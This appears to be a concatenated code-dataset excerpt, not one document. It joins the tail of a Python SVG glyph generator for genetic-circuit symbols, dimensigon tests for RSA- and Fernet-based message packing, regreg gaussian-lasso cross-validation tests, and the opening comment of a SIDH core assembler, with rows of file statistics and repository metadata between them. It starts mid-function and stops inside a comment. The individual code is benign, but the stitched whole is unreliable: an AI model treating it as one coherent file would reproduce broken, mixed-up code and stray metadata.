composite_path2['d'] = eval_parameterised_path(composite_path2['parametric:d'], params)
composite_path2['style'] = style_text['unfilled-path']
glyph_paths.append(composite_path2)
composite_path2 = {}
composite_path2['class'] = 'unfilled-path'
composite_path2['id'] = 'composite-path'
composite_path2['parametric:d'] = 'M{(baseline_x+pad_before)+((width*0.15)*(2.0/10.0))},{(baseline_y-baseline_offset)+height-(height*(2.0/10.0))} L{(baseline_x+pad_before)+((width*0.15)*(0.0/10.0))},{(baseline_y-baseline_offset)+height-(height*(0.0/10.0))}'
composite_path2['d'] = eval_parameterised_path(composite_path2['parametric:d'], params)
composite_path2['style'] = style_text['unfilled-path']
glyph_paths.append(composite_path2)
composite_path2 = {}
composite_path2['class'] = 'unfilled-path'
composite_path2['id'] = 'composite-path'
composite_path2['parametric:d'] = 'M{(baseline_x+pad_before)+width-((width*0.15)*(10.0/10.0))},{(baseline_y-baseline_offset)+height-(height*(10.0/10.0))} L{(baseline_x+pad_before)+width-((width*0.15)*(8.0/10.0))},{(baseline_y-baseline_offset)+height-(height*(8.0/10.0))}'
composite_path2['d'] = eval_parameterised_path(composite_path2['parametric:d'], params)
composite_path2['style'] = style_text['unfilled-path']
glyph_paths.append(composite_path2)
composite_path2 = {}
composite_path2['class'] = 'unfilled-path'
composite_path2['id'] = 'composite-path'
composite_path2['parametric:d'] = 'M{(baseline_x+pad_before)+width-((width*0.15)*(6.0/10.0))},{(baseline_y-baseline_offset)+height-(height*(6.0/10.0))} L{(baseline_x+pad_before)+width-((width*0.15)*(4.0/10.0))},{(baseline_y-baseline_offset)+height-(height*(4.0/10.0))}'
composite_path2['d'] = eval_parameterised_path(composite_path2['parametric:d'], params)
composite_path2['style'] = style_text['unfilled-path']
glyph_paths.append(composite_path2)
composite_path2 = {}
composite_path2['class'] = 'unfilled-path'
composite_path2['id'] = 'composite-path'
composite_path2['parametric:d'] = 'M{(baseline_x+pad_before)+width-((width*0.15)*(2.0/10.0))},{(baseline_y-baseline_offset)+height-(height*(2.0/10.0))} L{(baseline_x+pad_before)+width-((width*0.15)*(0.0/10.0))},{(baseline_y-baseline_offset)+height-(height*(0.0/10.0))}'
composite_path2['d'] = eval_parameterised_path(composite_path2['parametric:d'], params)
composite_path2['style'] = style_text['unfilled-path']
glyph_paths.append(composite_path2)
composite_path2 = {}
composite_path2['class'] = 'unfilled-path'
composite_path2['id'] = 'composite-path'
composite_path2['parametric:d'] = 'M{(baseline_x+pad_before)+(width*0.43)},{(baseline_y-baseline_offset)+height} L{(baseline_x+pad_before)+(width*0.47)},{(baseline_y-baseline_offset)+height}'
composite_path2['d'] = eval_parameterised_path(composite_path2['parametric:d'], params)
composite_path2['style'] = style_text['unfilled-path']
glyph_paths.append(composite_path2)
composite_path2 = {}
composite_path2['class'] = 'unfilled-path'
composite_path2['id'] = 'composite-path'
composite_path2['parametric:d'] = 'M{(baseline_x+pad_before)+(width*0.53)},{(baseline_y-baseline_offset)+height} L{(baseline_x+pad_before)+(width*0.57)},{(baseline_y-baseline_offset)+height}'
composite_path2['d'] = eval_parameterised_path(composite_path2['parametric:d'], params)
composite_path2['style'] = style_text['unfilled-path']
glyph_paths.append(composite_path2)
return header_text, glyph_paths
###############################################################################
# Generate complete set of SVG files
###############################################################################
# Add new glyphs in here until whole set is present
glyphs_to_process = [
['RibosomeEntrySite.svg', rbs_svg],
['Promoter.svg', promoter_svg],
['Terminator.svg', terminator_svg],
['CDS.svg', cds_svg],
['Primer.svg', primer_svg],
['OriginOfReplication.svg', origin_of_replication_svg],
['Unspecified.svg', unspecified_svg],
['OmittedDetail.svg', omitted_detail_svg],
['RecombinationSite.svg', recombination_site_svg],
['NoGlyph.svg', no_glyph_svg],
['Operator.svg', operator_svg],
['AssemblyScar.svg', assembly_scar_svg],
['BluntRestrictionSite.svg', blunt_restriction_site_svg],
['EngineeredRegion.svg', engineered_region_svg],
['Insulator.svg', insulator_svg],
['OriginOfTransfer.svg', origin_of_transfer_svg],
['StickyEndRestrictionEnzymeCleavageSite5.svg', sticky_restriction_site_5_svg],
['StickyEndRestrictionEnzymeCleavageSite3.svg', sticky_restriction_site_3_svg],
['OverhangSite5.svg', overhang_site_5_svg],
['OverhangSite3.svg', overhang_site_3_svg],
['Signature.svg', signature_svg],
['PolyASite.svg', poly_a_site_svg],
['DNALocation.svg', dna_location_svg],
['DNACleavageSite.svg', dna_cleavage_site_svg],
['DNAStabilityElement.svg', dna_stability_element_svg],
['Spacer.svg', spacer_svg],
['Aptamer.svg', aptamer_svg],
['NonCodingRNA.svg', non_coding_rna_svg],
['NucleicAcidOneStrand.svg', nucleic_acid_one_strand_svg],
['Composite.svg', composite_svg]]
# Final glyphs saved here with details (e.g. baseline and bounding box)
OUTPUT_PREFIX_FULL = './glyphs_2.0/'
INCLUDE_BOUNDING_BOX = True
INCLUDE_BASELINE = True
glyphs_to_process = [['Terminator.svg', terminator_svg],
['Promoter.svg', promoter_svg],
['RibosomeEntrySite.svg', rbs_svg],
['CDS.svg', cds_svg]]
for el in glyphs_to_process:
header_text, glyph_paths = el[1]()
write_glyph_svg(OUTPUT_PREFIX_FULL+el[0], header_text, glyph_paths)
| 62.925735
| 1,413
| 0.741245
| 12,756
| 85,579
| 4.674428
| 0.029476
| 0.0643
| 0.097221
| 0.111091
| 0.869791
| 0.827511
| 0.792108
| 0.770641
| 0.760142
| 0.732806
| 0
| 0.02371
| 0.08134
| 85,579
| 1,359
| 1,414
| 62.972038
| 0.73473
| 0.086283
| 0
| 0.52993
| 0
| 0.065141
| 0.494269
| 0.349206
| 0.00088
| 0
| 0
| 0
| 0
| 1
| 0.03169
| false
| 0
| 0.001761
| 0
| 0.066021
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e83a3b1e8fa92b7d9f52a47e51de4b197fdc7bfa
| 13,158
|
py
|
Python
|
tests/integration/network/test_pack.py
|
dimensigon/dimensigon
|
079d7c91a66e10f13510d89844fbadb27e005b40
|
[
"Apache-2.0"
] | 2
|
2020-11-20T10:27:14.000Z
|
2021-02-21T13:57:56.000Z
|
tests/integration/network/test_pack.py
|
dimensigon/dimensigon
|
079d7c91a66e10f13510d89844fbadb27e005b40
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/network/test_pack.py
|
dimensigon/dimensigon
|
079d7c91a66e10f13510d89844fbadb27e005b40
|
[
"Apache-2.0"
] | null | null | null |
from collections import OrderedDict
from unittest import TestCase
from unittest.mock import patch
import rsa
from cryptography.fernet import Fernet
from dimensigon.network.encryptation import pack_msg, unpack_msg
class TestPack_msg_pickle(TestCase):
@classmethod
def setUpClass(cls) -> None:
cls.pub_key, cls.priv_key = rsa.newkeys(1024)
cls.source = 'source'
cls.dest = 'dest'
cls.data = {'test': 'some random data', 'id': '11111111-2222-3333-4444-55555555abcd'}
cls.sym_key = Fernet.generate_key()
def test_pack_unpack_msg_with_keys(self):
packed_msg = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key)
self.assertIn('source', packed_msg)
self.assertIn('destination', packed_msg)
self.assertIn('key', packed_msg)
self.assertIn('signature', packed_msg)
self.assertIn('enveloped_data', packed_msg)
unpacked_msg = unpack_msg(packed_msg, self.pub_key, self.priv_key)
self.assertDictEqual(self.data, unpacked_msg)
def test_pack_unpack_msg_with_keys_change_dict_order(self):
packed_msg = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key)
self.assertIn('source', packed_msg)
self.assertIn('destination', packed_msg)
self.assertIn('key', packed_msg)
self.assertIn('signature', packed_msg)
self.assertIn('enveloped_data', packed_msg)
packed_msg = OrderedDict(packed_msg)
ed = packed_msg.pop('enveloped_data')
packed_msg['enveloped_data'] = ed
unpacked_msg = unpack_msg(packed_msg, self.pub_key, self.priv_key)
self.assertDictEqual(self.data, unpacked_msg)
def test_pack_unpack_msg_without_keys(self):
packed_msg = pack_msg(self.data, self.dest, self.source)
self.assertIn('source', packed_msg)
self.assertIn('destination', packed_msg)
self.assertNotIn('key', packed_msg)
self.assertNotIn('signature', packed_msg)
self.assertIn('enveloped_data', packed_msg)
unpacked_data = unpack_msg(packed_msg)
self.assertDictEqual(self.data, unpacked_data)
def test_unpack_signature_error(self):
packed_msg = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key)
packed_msg.update(source='changed')
with self.assertRaises(rsa.pkcs1.VerificationError):
unpack_msg(packed_msg, self.pub_key, self.priv_key)
def test_pack_unpack_with_symmetric_key(self):
packed_msg = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key,
symmetric_key=self.sym_key)
self.assertIn('source', packed_msg)
self.assertIn('destination', packed_msg)
self.assertNotIn('key', packed_msg)
self.assertIn('signature', packed_msg)
self.assertIn('enveloped_data', packed_msg)
with self.assertRaises(ValueError) as e:
unpacked_msg = unpack_msg(packed_msg, symmetric_key=self.sym_key)
unpacked_msg = unpack_msg(packed_msg, pub_key=self.pub_key, priv_key=self.priv_key, symmetric_key=self.sym_key)
self.assertDictEqual(self.data, unpacked_msg)
def test_pack_unpack_with_symmetric_key_force_key(self):
packed_msg = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key,
symmetric_key=self.sym_key,
add_key=True)
self.assertIn('source', packed_msg)
self.assertIn('destination', packed_msg)
self.assertIn('key', packed_msg)
self.assertIn('signature', packed_msg)
self.assertIn('enveloped_data', packed_msg)
with self.assertRaises(ValueError) as e:
unpacked_msg = unpack_msg(packed_msg, symmetric_key=self.sym_key)
unpacked_msg = unpack_msg(packed_msg, pub_key=self.pub_key, priv_key=self.priv_key)
self.assertDictEqual(self.data, unpacked_msg)
def test_pack_unpack_with_symmetric_key_no_rsa_keys(self):
packed_msg = pack_msg(self.data, self.dest, self.source, symmetric_key=self.sym_key)
self.assertIn('source', packed_msg)
self.assertIn('destination', packed_msg)
self.assertNotIn('key', packed_msg)
self.assertNotIn('signature', packed_msg)
self.assertIn('enveloped_data', packed_msg)
unpacked_msg = unpack_msg(packed_msg, symmetric_key=self.sym_key)
self.assertDictEqual(self.data, unpacked_msg)
def test_pack_unpack_with_symmetric_key_encrypted(self):
sym_key_encrypted = rsa.encrypt(self.sym_key, self.pub_key)
packed_msg = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key,
cipher_key=sym_key_encrypted)
self.assertIn('source', packed_msg)
self.assertIn('destination', packed_msg)
self.assertNotIn('key', packed_msg)
self.assertIn('signature', packed_msg)
self.assertIn('enveloped_data', packed_msg)
with self.assertRaises(ValueError) as e:
unpack_msg(packed_msg, symmetric_key=self.sym_key)
unpacked_msg = unpack_msg(packed_msg, pub_key=self.pub_key, priv_key=self.priv_key,
cipher_key=sym_key_encrypted)
self.assertDictEqual(self.data, unpacked_msg)
def test_pack_error(self):
sym_key_encrypted = rsa.encrypt(self.sym_key, self.pub_key)
with self.assertRaises(ValueError) as e:
pack_msg(self.data, self.dest, self.source, pub_key=self.pub_key, cipher_key=sym_key_encrypted)
@patch('dimensigon.utils.helpers.Fernet.generate_key')
def test_unpack_with_symmetric_key_as_parameter_and_cipher_in_msg(self, mocked_generate_key):
mocked_generate_key.return_value = self.sym_key
packed_msg = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key)
self.assertIn('source', packed_msg)
self.assertIn('destination', packed_msg)
self.assertIn('key', packed_msg)
self.assertIn('signature', packed_msg)
self.assertIn('enveloped_data', packed_msg)
with self.assertRaises(ValueError) as e:
unpack_msg(packed_msg, symmetric_key=self.sym_key)
unpacked_msg = unpack_msg(packed_msg, pub_key=self.pub_key, priv_key=self.priv_key, symmetric_key=self.sym_key)
self.assertDictEqual(self.data, unpacked_msg)
class TestPack_msg_json(TestCase):
@classmethod
def setUpClass(cls) -> None:
cls.pub_key, cls.priv_key = rsa.newkeys(1024)
cls.source = 'source'
cls.dest = 'dest'
cls.data = {'test': 'some random data'}
cls.sym_key = Fernet.generate_key()
def test_pack_unpack_msg_with_keys(self):
packed_msg = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key)
self.assertIn('source', packed_msg)
self.assertIn('destination', packed_msg)
self.assertIn('key', packed_msg)
self.assertIn('signature', packed_msg)
self.assertIn('enveloped_data', packed_msg)
unpacked_msg = unpack_msg(packed_msg, self.pub_key, self.priv_key)
self.assertDictEqual(self.data, unpacked_msg)
def test_pack_unpack_msg_without_keys(self):
packed_msg = pack_msg(self.data, self.dest, self.source)
self.assertIn('source', packed_msg)
self.assertIn('destination', packed_msg)
self.assertNotIn('key', packed_msg)
self.assertNotIn('signature', packed_msg)
self.assertIn('enveloped_data', packed_msg)
unpacked_data = unpack_msg(packed_msg)
self.assertDictEqual(self.data, unpacked_data)
def test_unpack_signature_error(self):
packed_msg = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key)
packed_msg.update(source='changed')
with self.assertRaises(rsa.pkcs1.VerificationError):
unpack_msg(packed_msg, self.pub_key, self.priv_key)
def test_pack_unpack_with_symmetric_key(self):
packed_msg = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key,
symmetric_key=self.sym_key)
self.assertIn('source', packed_msg)
self.assertIn('destination', packed_msg)
self.assertNotIn('key', packed_msg)
self.assertIn('signature', packed_msg)
self.assertIn('enveloped_data', packed_msg)
with self.assertRaises(ValueError) as e:
unpacked_msg = unpack_msg(packed_msg, symmetric_key=self.sym_key)
unpacked_msg = unpack_msg(packed_msg, pub_key=self.pub_key, priv_key=self.priv_key, symmetric_key=self.sym_key)
self.assertDictEqual(self.data, unpacked_msg)
def test_pack_unpack_with_symmetric_key_force_key(self):
packed_msg = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key,
symmetric_key=self.sym_key,
add_key=True)
self.assertIn('source', packed_msg)
self.assertIn('destination', packed_msg)
self.assertIn('key', packed_msg)
self.assertIn('signature', packed_msg)
self.assertIn('enveloped_data', packed_msg)
with self.assertRaises(ValueError) as e:
unpacked_msg = unpack_msg(packed_msg, symmetric_key=self.sym_key)
unpacked_msg = unpack_msg(packed_msg, pub_key=self.pub_key, priv_key=self.priv_key)
self.assertDictEqual(self.data, unpacked_msg)
def test_pack_unpack_with_symmetric_key_no_rsa_keys(self):
packed_msg = pack_msg(self.data, self.dest, self.source, symmetric_key=self.sym_key)
self.assertIn('source', packed_msg)
self.assertIn('destination', packed_msg)
self.assertNotIn('key', packed_msg)
self.assertNotIn('signature', packed_msg)
self.assertIn('enveloped_data', packed_msg)
unpacked_msg = unpack_msg(packed_msg, symmetric_key=self.sym_key)
self.assertDictEqual(self.data, unpacked_msg)
def test_pack_unpack_with_symmetric_key_encrypted(self):
sym_key_encrypted = rsa.encrypt(self.sym_key, self.pub_key)
packed_msg = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key,
cipher_key=sym_key_encrypted)
self.assertIn('source', packed_msg)
self.assertIn('destination', packed_msg)
self.assertNotIn('key', packed_msg)
self.assertIn('signature', packed_msg)
self.assertIn('enveloped_data', packed_msg)
with self.assertRaises(ValueError) as e:
unpack_msg(packed_msg, symmetric_key=self.sym_key)
unpacked_msg = unpack_msg(packed_msg, pub_key=self.pub_key, priv_key=self.priv_key,
cipher_key=sym_key_encrypted)
self.assertDictEqual(self.data, unpacked_msg)
def test_pack_error(self):
sym_key_encrypted = rsa.encrypt(self.sym_key, self.pub_key)
with self.assertRaises(ValueError) as e:
pack_msg(self.data, self.dest, self.source, pub_key=self.pub_key, cipher_key=sym_key_encrypted)
@patch('dimensigon.utils.helpers.Fernet.generate_key')
def test_unpack_with_symmetric_key_as_parameter_and_cipher_in_msg(self, mocked_generate_key):
mocked_generate_key.return_value = self.sym_key
sym_key_encrypted = rsa.encrypt(self.sym_key, self.pub_key)
packed_msg = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key)
self.assertIn('source', packed_msg)
self.assertIn('destination', packed_msg)
self.assertIn('key', packed_msg)
self.assertIn('signature', packed_msg)
self.assertIn('enveloped_data', packed_msg)
with self.assertRaises(ValueError) as e:
unpack_msg(packed_msg, symmetric_key=self.sym_key)
unpacked_msg = unpack_msg(packed_msg, pub_key=self.pub_key, priv_key=self.priv_key, symmetric_key=self.sym_key)
self.assertDictEqual(self.data, unpacked_msg)
def test_unpack_without_data_and_keys(self):
packed_msg = pack_msg({}, self.dest, self.source, self.pub_key, self.priv_key)
self.assertIn('source', packed_msg)
self.assertIn('destination', packed_msg)
self.assertIn('key', packed_msg)
self.assertIn('signature', packed_msg)
self.assertIn('enveloped_data', packed_msg)
with self.assertRaises(ValueError) as e:
unpack_msg(packed_msg, symmetric_key=self.sym_key)
unpacked_msg = unpack_msg(packed_msg, pub_key=self.pub_key, priv_key=self.priv_key, symmetric_key=self.sym_key)
self.assertDictEqual({}, unpacked_msg)
def test_unpack_without_data_and_without_keys(self):
packed_msg = pack_msg({}, self.dest, self.source)
self.assertIn('source', packed_msg)
self.assertIn('destination', packed_msg)
self.assertNotIn('key', packed_msg)
self.assertNotIn('signature', packed_msg)
self.assertIn('enveloped_data', packed_msg)
unpacked_msg = unpack_msg(packed_msg)
self.assertDictEqual({}, unpacked_msg)
| 41.771429
| 119
| 0.69091
| 1,744
| 13,158
| 4.894495
| 0.049885
| 0.145501
| 0.115745
| 0.132849
| 0.95724
| 0.95724
| 0.955483
| 0.954545
| 0.946931
| 0.946931
| 0
| 0.003637
| 0.205958
| 13,158
| 314
| 120
| 41.904459
| 0.813361
| 0
| 0
| 0.917749
| 0
| 0
| 0.072883
| 0.009424
| 0
| 0
| 0
| 0
| 0.497836
| 1
| 0.099567
| false
| 0
| 0.025974
| 0
| 0.134199
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e84c112cd6559c2a31921fbe9ae54f6bfe997787
| 6,840
|
py
|
Python
|
regreg/sklearn/tests/test_gaussian.py
|
vishalbelsare/regreg
|
d1b62cc43cdd83331f2b0817b0ae099d5ef97966
|
[
"BSD-2-Clause"
] | 11
|
2016-02-25T01:53:03.000Z
|
2020-11-30T00:59:46.000Z
|
regreg/sklearn/tests/test_gaussian.py
|
vishalbelsare/regreg
|
d1b62cc43cdd83331f2b0817b0ae099d5ef97966
|
[
"BSD-2-Clause"
] | 21
|
2015-09-17T19:18:09.000Z
|
2021-04-28T06:15:02.000Z
|
regreg/sklearn/tests/test_gaussian.py
|
vishalbelsare/regreg
|
d1b62cc43cdd83331f2b0817b0ae099d5ef97966
|
[
"BSD-2-Clause"
] | 8
|
2016-03-24T00:03:03.000Z
|
2019-08-25T23:40:42.000Z
|
import numpy as np
try:
from sklearn.model_selection import cross_validate
from sklearn.model_selection import GridSearchCV
from ..api import (gaussian,
gaussian_lagrange)
have_sklearn = True
except ImportError:
have_sklearn = False
from ...api import l1norm, group_lasso
from ...tests.decorators import set_seed_for_test
@np.testing.dec.skipif(not have_sklearn)
@set_seed_for_test()
def test_regression_gaussian():
n, p = 100, 20
X = np.random.standard_normal((n, p))
y = np.random.standard_normal(n)
atom = l1norm
atom_args = {'shape':p, 'lagrange':2*np.sqrt(n)}
gaussian_lasso = gaussian(atom, atom_args)
gaussian_lasso.fit(X, y)
print(cross_validate(gaussian_lasso, X, y, cv=10))
# grid search
params = {'atom_params':[{'shape':p,
'lagrange': alpha * 2 * np.sqrt(n)} for alpha in [0.5, 1, 1.5]]}
lasso_cv = GridSearchCV(gaussian_lasso, params, cv=3)
lasso_cv.fit(X, y)
gaussian_lasso_offset = gaussian(atom, atom_args,
offset=True)
y_offset = np.array([y, np.random.standard_normal(n)]).T
gaussian_lasso_offset.fit(X, y_offset)
gaussian_lasso_weights = gaussian(atom, atom_args,
case_weights=True,
score_method='mean_deviance')
y_weights = np.array([y, np.ones_like(y)]).T
gaussian_lasso_weights.fit(X, y_weights)
np.testing.assert_allclose(gaussian_lasso_weights._coefs,
gaussian_lasso._coefs)
GridSearchCV(gaussian_lasso_offset, params, cv=3).fit(X, y_offset)
GridSearchCV(gaussian_lasso_weights, params, cv=3).fit(X, y_weights)
gaussian_lasso_both = gaussian(atom, atom_args,
offset=True,
case_weights=True,
score_method='R2')
y_both = np.array([y, np.ones_like(y), y_offset[:,1]]).T
GridSearchCV(gaussian_lasso_both, params, cv=3).fit(X, y_both)
def atom_constructor(null_grad, **args):
return l1norm(**args)
gaussian_lasso_enet = gaussian_lagrange(atom_constructor,
atom_args,
offset=True,
enet_alpha=0.5,
case_weights=True,
score_method='R2')
y_both = np.array([y, np.ones_like(y), y_offset[:,1]]).T
GridSearchCV(gaussian_lasso_enet, params, cv=3).fit(X, y_both)
@np.testing.dec.skipif(not have_sklearn)
@set_seed_for_test()
def test_regression_group_lasso():
n, p = 100, 20
X = np.random.standard_normal((n, p))
y = np.random.standard_normal(n)
atom = group_lasso
atom_args = {'groups':[0]*10+[1]*10, 'lagrange':2*np.sqrt(n)}
gaussian_lasso = gaussian(atom, atom_args)
gaussian_lasso.fit(X, y)
print(cross_validate(gaussian_lasso, X, y, cv=10))
# grid search
params = {'atom_params':[{'groups':[0]*10+[1]*10,
'lagrange': alpha * 2 * np.sqrt(n)} for alpha in [0.5, 1, 1.5]]}
lasso_cv = GridSearchCV(gaussian_lasso, params, cv=3)
lasso_cv.fit(X, y)
gaussian_lasso_offset = gaussian(atom, atom_args,
offset=True)
y_offset = np.array([y, np.random.standard_normal(n)]).T
gaussian_lasso_offset.fit(X, y_offset)
gaussian_lasso_weights = gaussian(atom, atom_args,
case_weights=True,
score_method='mean_deviance')
y_weights = np.array([y, np.ones_like(y)]).T
gaussian_lasso_weights.fit(X, y_weights)
np.testing.assert_allclose(gaussian_lasso_weights._coefs,
gaussian_lasso._coefs)
GridSearchCV(gaussian_lasso_offset, params, cv=3).fit(X, y_offset)
GridSearchCV(gaussian_lasso_weights, params, cv=3).fit(X, y_weights)
gaussian_lasso_both = gaussian(atom, atom_args,
offset=True,
case_weights=True,
score_method='R2')
y_both = np.array([y, np.ones_like(y), y_offset[:,1]]).T
GridSearchCV(gaussian_lasso_both, params, cv=3).fit(X, y_both)
def atom_constructor(null_grad, **args):
return group_lasso(**args)
gaussian_lasso_enet = gaussian_lagrange(atom_constructor,
atom_args,
offset=True,
enet_alpha=0.5,
case_weights=True,
score_method='R2')
y_both = np.array([y, np.ones_like(y), y_offset[:,1]]).T
GridSearchCV(gaussian_lasso_enet, params, cv=3).fit(X, y_both)
@np.testing.dec.skipif(not have_sklearn)
@set_seed_for_test()
def test_regression_gaussian_bound():
n, p = 100, 20
X = np.random.standard_normal((n, p))
y = np.random.standard_normal(n)
atom = l1norm
atom_args = {'shape':p, 'bound':3}
gaussian_lasso = gaussian(atom,
atom_args)
gaussian_lasso.fit(X, y)
print(cross_validate(gaussian_lasso, X, y, cv=10))
# grid search
params = {'atom_params':[{'shape':p,
'bound': b,
} for b in [3, 4, 5]]}
lasso_cv = GridSearchCV(gaussian_lasso, params, cv=3)
lasso_cv.fit(X, y)
gaussian_lasso_offset = gaussian(atom,
atom_args,
offset=True)
y_offset = np.array([y, np.random.standard_normal(n)]).T
gaussian_lasso_offset.fit(X, y_offset)
gaussian_lasso_weights = gaussian(atom,
atom_args,
case_weights=True,
score_method='mean_deviance')
y_weights = np.array([y, np.ones_like(y)]).T
gaussian_lasso_weights.fit(X, y_weights)
np.testing.assert_allclose(gaussian_lasso_weights._coefs,
gaussian_lasso._coefs)
GridSearchCV(gaussian_lasso_offset, params, cv=3).fit(X, y_offset)
GridSearchCV(gaussian_lasso_weights, params, cv=3).fit(X, y_weights)
gaussian_lasso_both = gaussian(atom,
atom_args,
offset=True,
case_weights=True,
score_method='R2')
y_both = np.array([y, np.ones_like(y), y_offset[:,1]]).T
GridSearchCV(gaussian_lasso_both, params, cv=3).fit(X, y_both)
| 37.377049
| 94
| 0.557456
| 836
| 6,840
| 4.29067
| 0.104067
| 0.166713
| 0.03206
| 0.066908
| 0.926122
| 0.908837
| 0.902147
| 0.902147
| 0.902147
| 0.902147
| 0
| 0.018214
| 0.333772
| 6,840
| 182
| 95
| 37.582418
| 0.768927
| 0.005117
| 0
| 0.797101
| 0
| 0
| 0.022951
| 0
| 0
| 0
| 0
| 0
| 0.021739
| 1
| 0.036232
| false
| 0
| 0.050725
| 0.014493
| 0.101449
| 0.021739
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e8810dbfee67b7a4d80c9f6cecbf412b0bc1b995
| 135,532
|
py
|
Python
|
assembler/assembler_v128.py
|
pmassolino/hw-sike
|
1fee8af81dcc3d0dcc57bc656e06acc6adf810a1
|
[
"CC0-1.0"
] | 7
|
2020-01-15T13:36:37.000Z
|
2021-04-10T02:54:28.000Z
|
assembler/assembler_v128.py
|
pmassolino/hw-sike
|
1fee8af81dcc3d0dcc57bc656e06acc6adf810a1
|
[
"CC0-1.0"
] | null | null | null |
assembler/assembler_v128.py
|
pmassolino/hw-sike
|
1fee8af81dcc3d0dcc57bc656e06acc6adf810a1
|
[
"CC0-1.0"
] | null | null | null |
#
# Register
# Dir 0 - Direct access
# ---- ---- Value between 0 to 255
# Dir 1 - Indirect access
# 00000 0000 Disable operand
# 00000 0001 Reserved
# 00--- ---- Reserved
# 10000 0000 RD0
# 10000 0001 RD1
# 10000 0010 RD2
# 10000 0011 RD3
# 10000 0100 RD4
# 10000 0101 RD5
# 10000 0110 RD6
# 10000 0111 RD7
# 10000 1000 RD8
# 10000 1001 RD9
# 10000 1010 RD10
# 10000 1011 RD11
# 10000 1100 RD12
# 10000 1101 RD13
# 10000 1110 RD14
# 10000 1111 RD15
# 10001 0000 RD16
# ...
# 10010 0000 RD32
# ...
# 100 11 1111 RD63
# 10100 ---- Reserved
# -- RDO 1 MSB bit
# 11000 0010 (RD3 if RD0 = 1 else RD2)
# 11000 0011 (RD2 if RD0 = 1 else RD3)
# 11000 0100 (RD5 if RD0 = 1 else RD4)
# 11000 0101 (RD4 if RD0 = 1 else RD5)
# 11000 0110 (RD7 if RD0 = 1 else RD6)
# 11000 0111 (RD6 if RD0 = 1 else RD7)
# 11000 1010 (RD9 if RD0 = 1 else RD8)
# 11000 1011 (RD8 if RD0 = 1 else RD9)
# 11000 1100 (RD11 if RD0 = 1 else RD10)
# 11000 1101 (RD10 if RD0 = 1 else RD11)
# 11000 1110 (RD13 if RD0 = 1 else RD12)
# 11000 1111 (RD12 if RD0 = 1 else RD13)
# 11000 1110 (RD15 if RD0 = 1 else RD14)
# 11000 1111 (RD14 if RD0 = 1 else RD15)
# 11001 ---- Reserved
# -- RDO 1 LSB bit
# 11100 0010 (RD3 if RD0 = 1 else RD2)
# 11100 0011 (RD2 if RD0 = 1 else RD3)
# 11100 0100 (RD5 if RD0 = 1 else RD4)
# 11100 0101 (RD4 if RD0 = 1 else RD5)
# 11100 0110 (RD7 if RD0 = 1 else RD6)
# 11100 0111 (RD6 if RD0 = 1 else RD7)
# 11100 1010 (RD9 if RD0 = 1 else RD8)
# 11100 1011 (RD8 if RD0 = 1 else RD9)
# 11100 1100 (RD11 if RD0 = 1 else RD10)
# 11100 1101 (RD10 if RD0 = 1 else RD11)
# 11100 1110 (RD13 if RD0 = 1 else RD12)
# 11100 1111 (RD12 if RD0 = 1 else RD13)
# 11100 1110 (RD15 if RD0 = 1 else RD14)
# 11100 1111 (RD14 if RD0 = 1 else RD15)
# 11101 ---- Reserved
#
# Instructions model
#
# | 63 62 | 61 | 60 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | type | Dir memo | Sign Dir Cx memb | Sign Dir Cx mema |
#
# | 63 62 | 61 59 | 58 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 01 | 000 | type | Dir Mo | 0 Dir En Mb | Sign Dir En Ma |
#
#
# SIDH core instructions (00)
#
# If Cx = 0
# memx = 16 bits constant
# Cx = 1
# memx = 16 bits memory position
#
# #constant
# constant = direct number
# #(n)constant
# n*constant = multiplied factor, n is a number, only works if it can be solved by the compiler.
#
# NOP - Do nothing and goes to the next instruction.
# nop
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 000000 | 0 0 | 0 0 0 0 | 0 0 0 0 |
#
# Jump - Jump to the specified position, memo -> PC
# Local bus memory
# OOOO = #constant
# jump OOOO
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 000001 | 0 memo | 0 0 0 0 | 0 0 0 0 |
#
# Jump - Jump if equal to the specified position, memo -> PC if memb = mema
# Local bus memory
# OOOO = #constant
# YYYY = #constant
# YYYY = rdYY
# XXXX = #constant
# XXXX = rdXX
# jumpeq OOOO YYYYY XXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 000001 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
#
